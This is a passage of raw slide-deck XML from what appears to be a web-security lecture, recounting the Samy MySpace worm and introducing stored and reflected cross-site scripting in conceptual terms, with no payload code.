                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>failed</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D3F2937-EFE2-0F4B-B50B-14DE817BF18D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="3597275"/>
            <a:ext cx="147637"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8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AEB41AA-E539-F14D-A7F4-B18E04EDEAF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079500" y="3549650"/>
            <a:ext cx="8064500" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Users who </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>visited </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>his </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>page </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ran the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>program,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>which</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8419E83-0170-304A-BE9F-E5B9344C6394}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="4137025"/>
            <a:ext cx="149225"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0" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B56A7F30-1237-0C46-9AA2-83E0C217AE2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="4675188"/>
            <a:ext cx="149225" cy="293687"/>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1" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9410A81E-4A24-094A-B971-E6369DC15DA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="5213350"/>
            <a:ext cx="149225"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62828" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148F96CC-12DA-C245-9F15-301208814DC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1422400" y="4083050"/>
            <a:ext cx="7896225"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500">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Made them friends with Samy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="137000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Displayed “but most of all, Samy is my hero” on profile  Installed script in their profile to propagate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B92C580-C4AD-614D-A8AF-61F0385BAC24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="5994400"/>
            <a:ext cx="147637"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4" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EED66C3-9CFA-2F43-AFC6-E5DACD81CDA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079500" y="5949950"/>
            <a:ext cx="6464300" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-45" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>From </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>73 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1,000,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>friends </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-45" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hours</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2376C956-53A3-5646-835F-78B4368C39F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="6534150"/>
            <a:ext cx="149225"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6" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDE5CC48-B73F-D844-985E-715D59C5CE91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1422400" y="6483350"/>
            <a:ext cx="5969000" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Took </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>down </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>MySpace </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>weekend</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162833" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{081264FD-F921-8446-94A1-80F412D7B958}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="5257800"/>
            <a:ext cx="2209800" cy="2209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2104D54-15AF-DE44-9389-418B28B3190D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1232903" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="-265" dirty="0"/>
              <a:t>Two </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="85" dirty="0"/>
              <a:t>types </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="130" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-325" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6DAF0E5-358D-134E-BCCD-2A5E281BD38C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="2197100"/>
            <a:ext cx="6780212" cy="379413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="441815" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1.	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3700" spc="-15" baseline="1133" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3700" spc="-7" baseline="1133" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3700" spc="44" baseline="1133" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>“persistent”) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3700" spc="-209" baseline="1133" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3700" spc="-67" baseline="1133" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3700" spc="30" baseline="1133" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:endParaRPr sz="3700" baseline="1133" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D35EE132-CFE1-E342-8083-962C8588EB3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="2738438"/>
            <a:ext cx="104775" cy="184150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="190" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9548E14-618E-E04D-8E35-ACCAB0AD91B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="3116263"/>
            <a:ext cx="104775" cy="184150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="190" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163846" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC51B176-0DFE-C441-AA7F-991916F713F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1106488" y="2362200"/>
            <a:ext cx="77343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12725">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56000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker leaves their script on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bank.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>server  The server later unwittingly sends it to your browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="975"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Your browser, none the wiser, executes it within the same origin as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="75"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1013E0DF-3D8A-EE4C-8393-A3F38A00AD5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="4302125"/>
            <a:ext cx="3378200" cy="379413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="441815" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2.	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reflected </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-140" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5D45DF4-4CC3-5B41-8A4B-57F6AF6EF131}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="4856163"/>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9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0081611-B015-6547-B29E-85D5EAA93704}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="5721350"/>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0" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
